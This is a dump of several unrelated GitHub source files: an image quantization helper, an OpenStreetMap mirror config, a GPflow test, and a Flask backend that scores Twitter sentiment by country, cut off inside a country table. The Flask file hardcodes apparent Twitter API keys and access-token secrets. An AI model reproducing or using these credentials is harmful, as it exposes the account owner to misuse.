a0f714b0b29d4c970c5c40f6613bfef6210cafc4
|
[] |
no_license
|
SrinidhiPalwayi/ps3
|
e2a651c5da3c80ae86817053c605f8af6f0cafeb
|
fb03663cb0d82eedb6dc2a21c22a80d20614de68
|
refs/heads/master
| 2020-04-02T16:21:55.821199
| 2018-10-25T04:17:41
| 2018-10-25T04:17:41
| 154,609,228
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 424
|
py
|
import matplotlib.pyplot as plt
import numpy as np
from sklearn import cluster
from scipy import misc
import scipy.misc
from skimage import color
def computeQuantizationError(origImage, quantizedImg):
start = plt.imread(origImage)
start = np.array(start, dtype='float')
end = quantizedImg
diff = np.subtract(start,end)
diff = diff.flatten()
square = np.power(diff,2)
return np.sum(square)
|
[
"srinidhipalwayi@lawn-143-215-114-218.lawn.gatech.edu"
] |
srinidhipalwayi@lawn-143-215-114-218.lawn.gatech.edu
|
77f975580a4eff9e2a4663283f48895dc34d8117
|
9374a0514cf193189f57f6ee96b4c4c7d226c689
|
/config.py
|
6e6df87c59768c72662dd74b2511825eccd2a749
|
[] |
no_license
|
h4ck3rm1k3/replication-mirror
|
cbb08d8e29e3cd190816896939c0df2b7b21c93e
|
aaa69a8843e86744194bf7584d15bd76a7b71947
|
refs/heads/master
| 2021-01-15T10:37:14.184293
| 2012-09-03T21:41:22
| 2012-09-03T21:41:22
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 170
|
py
|
REPLICATE_BASE = 'http://planet.openstreetmap.org/redaction-period/minute-replicate/'
REPLICATE_DISK = '/home/pnorman/osm/replication-mirror/redaction-minute-replication'
|
[
"penorman@mac.com"
] |
penorman@mac.com
|
1465d969eefc5d32ecc6801620377401355e9a4c
|
0f4d72e1d30d2986e5fdfc98723b260166132e03
|
/tests/gpflow/likelihoods/test_heteroskedastic.py
|
8ad798ec3e236f03b623943501ba8864c035b2b8
|
[
"Apache-2.0"
] |
permissive
|
vishalbelsare/GPflow
|
4991c238b7f8021c155940f3dfe99fb6bf0186ca
|
b716d22c7428f1bbe6bf4b361fdd0c7cb342a000
|
refs/heads/develop
| 2023-08-17T12:04:09.178253
| 2023-08-09T07:05:49
| 2023-08-09T07:05:49
| 392,794,283
| 0
| 0
|
Apache-2.0
| 2023-08-09T11:34:26
| 2021-08-04T18:42:41
|
Python
|
UTF-8
|
Python
| false
| false
| 1,688
|
py
|
# Copyright 2020 The GPflow Contributors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import numpy as np
import tensorflow as tf
from gpflow.base import AnyNDArray
from gpflow.likelihoods import HeteroskedasticTFPConditional
tf.random.set_seed(99012)
class Data:
rng = np.random.RandomState(123)
N = 5
X = np.linspace(0, 1, num=N)[:, None]
Y = rng.randn(N, 1)
f_mean = rng.randn(N, 2)
f_var: AnyNDArray = rng.randn(N, 2) ** 2
def test_analytic_mean_and_var() -> None:
"""
Test that quadrature computation used in HeteroskedasticTFPConditional
of the predictive mean and variance is close to the analytical version,
which can be computed for the special case of N(y | mean=f1, scale=exp(f2)),
where f1, f2 ~ GP.
"""
analytic_mean = Data.f_mean[:, [0]]
analytic_variance = np.exp(Data.f_mean[:, [1]] + Data.f_var[:, [1]]) ** 2 + Data.f_var[:, [0]]
likelihood = HeteroskedasticTFPConditional()
y_mean, y_var = likelihood.predict_mean_and_var(Data.X, Data.f_mean, Data.f_var)
np.testing.assert_allclose(y_mean, analytic_mean)
np.testing.assert_allclose(y_var, analytic_variance, rtol=1.5e-6)
|
[
"noreply@github.com"
] |
vishalbelsare.noreply@github.com
|
7e74111ed54dae397d94ad4472237e042aa8c481
|
3b8d74a60e923da959e8d36a74b34c10e11c3733
|
/backend/index.py
|
672c53b56cac6f04c0d11a740ed7d4166ff931c0
|
[] |
no_license
|
zain-mustafa/sentiment-analysis
|
ca7d86f27fc73d16d5339918b01074b939968896
|
42d0de01d305d3e61770d198d003616c6df2807e
|
refs/heads/master
| 2020-05-19T10:59:54.738766
| 2019-05-05T05:11:35
| 2019-05-05T05:11:35
| 184,979,562
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 39,516
|
py
|
import json
import re
from flask import Flask, jsonify
import tweepy
from twython import Twython, TwythonError
from tweepy import OAuthHandler
from textblob import TextBlob
import re
import requests, json
import pymongo
from pymongo import MongoClient
app = Flask(__name__)
consumer_key = 'iSaIm4vG1kI2wGkaiuWYD5vN9'
consumer_secret = '5zBcyyMS20926lWyXNnJq2vjnQNiHMNNHElD7Ymnbc5n5zACJ3'
access_token = '1050518240974258179-9Gpi9dZA77Ivs1hhFy8JThC6iCqY6l'
access_token_secret = 'jy6jeQsdyp9Q2ySlPtrgyckadzYfddmxitvl9cB7uhnAy'
auth = OAuthHandler(consumer_key, consumer_secret)
auth.set_access_token(access_token, access_token_secret)
api = tweepy.API(auth)
twitter = Twython(consumer_key, consumer_secret, access_token, access_token_secret)
client = MongoClient('localhost', 27017)
client = MongoClient('mongodb://localhost:27017')
db = client.saugs
@app.route('/twitter/<query>')
def get_tweets(query):
count = 100
users_with_geodata = {
"data": []
}
all_users = []
total_tweets = 0
geo_tweets = 0
countries = get_countries_list()
fetched_tweets = api.search(q = query, count = count)
for tweet in fetched_tweets:
tweet_text = tweet.text
sentiment_analysis = get_tweet_sentiment(tweet_text)
if tweet.user.id:
total_tweets += 1
user_id = tweet.user.id
if user_id not in all_users:
all_users.append(user_id)
user_data = {
"user_id" : tweet.user.id,
"result" : {
"name" : tweet.user.name,
"id": tweet.user.id,
"screen_name": tweet.user.screen_name,
"tweets" : 1,
"location": tweet.user.location,
}
}
if tweet.coordinates:
user_data["result"]["primary_geo"] = 'US' # str(tweet.coordinates[tweet.coordinates.keys()[1]][1]) + ", " + str(tweet.coordinates[tweet.coordinates.keys()[1]][0])
user_data["result"]["geo_type"] = "Tweet coordinates"
elif tweet.place:
user_data["result"]["primary_geo"] = tweet.place.full_name + ", " + tweet.place.country
user_data["result"]["geo_type"] = "Tweet place"
else:
user_data["result"]["primary_geo"] = tweet.user.location
user_data["result"]["geo_type"] = "User location"
if user_data["result"]["primary_geo"]:
user_data["result"]["analysis_result"] = sentiment_analysis
user_data["result"]["country"] = get_country(user_data["result"]["primary_geo"])
print(user_data["result"]["country"])
if user_data["result"]["country"] is not None:
if user_data["result"]["country"] in countries:
countries[user_data["result"]["country"]]["total_tweets"] = countries[user_data["result"]["country"]]["total_tweets"] + 1
if sentiment_analysis.sentiment.polarity > 0:
countries[user_data["result"]["country"]]["positive"] = countries[user_data["result"]["country"]]["positive"] + 1
elif sentiment_analysis.sentiment.polarity < 0:
countries[user_data["result"]["country"]]["negative"] = countries[user_data["result"]["country"]]["negative"] + 1
else:
countries[user_data["result"]["country"]]["neutral"] = countries[user_data["result"]["country"]]["neutral"] + 1
total_polarity = countries[user_data["result"]["country"]]["total_polarity"]
total_polarity = total_polarity + sentiment_analysis.sentiment.polarity
mean = total_polarity / countries[user_data["result"]["country"]]["total_tweets"]
countries[user_data["result"]["country"]]["total_polarity"] = total_polarity
countries[user_data["result"]["country"]]["total"] = mean * 100
users_with_geodata['data'].append(user_data)
geo_tweets += 1
elif user_id in all_users:
for user in users_with_geodata["data"]:
if user_id == user["user_id"]:
user["result"]["tweets"] += 1
for user in users_with_geodata["data"]:
geo_tweets = geo_tweets + user["result"]["tweets"]
print("The file included " + str(len(all_users)) + " unique users who tweeted with or without geo data")
print("The file included " + str(len(users_with_geodata['data'])) + " unique users who tweeted with geo data, including 'location'")
print("The users with geo data tweeted " + str(geo_tweets) + " out of the total " + str(total_tweets) + " of tweets.")
return jsonify(countries), {'Access-Control-Allow-Origin': '*'}
def get_tweet_sentiment(tweet):
# create TextBlob object of passed tweet text
analysis = TextBlob(clean_tweet(tweet))
return analysis
# set sentiment
if analysis.sentiment.polarity > 0:
return 'positive'
elif analysis.sentiment.polarity == 0:
return 'neutral'
else:
return 'negative'
def clean_tweet(tweet):
return ' '.join(re.sub("(@[A-Za-z0-9]+)|([^0-9A-Za-z \t])|(\w+:\/\/\S+)", " ", tweet).split())
def get_country(location):
countries_collection = db.countries
splitted_data = location.split(',')
country = ''
if len(splitted_data) > 0:
city = splitted_data[0]
splitted_cities = city.split(' ')
for city in splitted_cities:
for x in countries_collection.find({ "name" : {"$regex": city, '$options': 'i'} } ):
country = x["country"]
break
if country == "":
for city in splitted_cities:
for x in countries_collection.find({ "subcountry" : {"$regex": city, '$options': 'i'} } ):
country = x["country"]
break
else:
for x in countries_collection.find({ "name" : {"$regex": location, '$options': 'i'} } ):
country = x["country"]
return country
def get_countries_list():
countries = {
"Afghanistan": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Albania": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Algeria": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Angola": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Anguilla": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Antigua and Barbuda": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Argentina": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Armenia": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Aruba": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Australia": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Austria": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Azerbaijan": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Bahamas, The": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Bahrain": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Bangladesh": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Barbados": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Belarus": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Belgium": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Belize": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Benin": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Bermuda": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Bhutan": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Bolivia": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Bosnia and Herz.": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Botswana": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Brazil": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"British Virgin Islands": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Brunei": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Bulgaria": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Burkina Faso": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Burundi": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Cambodia": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Cameroon": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Canada": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Cape Verde": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Cayman Islands": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Central African Rep.": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Chad": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Chile": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"China": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Colombia": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Comoros": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Dem. Rep. Congo": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Congo": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Cook Islands": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Costa Rica": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Ivory Coast": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Croatia": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Cuba": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Curacao": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Cyprus": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Czech Rep.": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Denmark": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Djibouti": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Dominica": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Dominican Rep.": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Ecuador": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Egypt": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"El Salvador": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Equatorial Guinea": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Eritrea": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Estonia": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Ethiopia": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"European Union": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Falkland Islands": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Faroe Islands": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Fiji": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Finland": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"France": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"French Polynesia": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Gabon": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Gambia, The": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Georgia": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Germany": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Ghana": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Gibraltar": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Greece": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Greenland": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Grenada": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Guatemala": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Guernsey": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Guinea": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Guinea-Bissau": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Guyana": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Haiti": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Honduras": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Hong Kong": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Hungary": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Iceland": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"India": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Indonesia": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Iran": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Iraq": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Ireland": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Isle of Man": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Israel": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Italy": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Jamaica": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Japan": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Jersey": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Jordan": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Kazakhstan": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Kenya": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Kiribati": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Dem. Rep. Korea": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Korea": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Kosovo": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Kuwait": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Kyrgyzstan": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Lao PDR": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Latvia": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Lebanon": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Lesotho": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Liberia": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Libya": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Liechtenstein": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Lithuania": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Luxembourg": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Macau": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Macedonia": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Madagascar": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Malawi": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Malaysia": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Maldives": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Mali": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Malta": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Marshall Islands": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Mauritania": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Mauritius": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Mexico": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Micronesia, Federated States of": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Moldova": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Monaco": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Mongolia": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Montenegro": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Montserrat": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Morocco": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Mozambique": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Myanmar": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Namibia": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Nepal": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Netherlands": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"New Caledonia": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"New Zealand": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Nicaragua": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Niger": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Nigeria": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Niue": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Norway": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Oman": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Pakistan": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Palau": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Panama": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Papua New Guinea": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Paraguay": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Peru": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Philippines": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Poland": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Portugal": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Puerto Rico": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Qatar": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Romania": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Russia": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Rwanda": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Saint Kitts and Nevis": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Saint Lucia": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Saint Martin": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Saint Vincent and the Grenadines": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Samoa": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"San Marino": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Sao Tome and Principe": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Saudi Arabia": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Senegal": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Serbia": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Seychelles": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Sierra Leone": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Singapore": {
"positive": 0, "neutral": 0, "negative": 0, "total": 200, "total_tweets": 0, "total_polarity": 0
},
"Sint Maarten": {
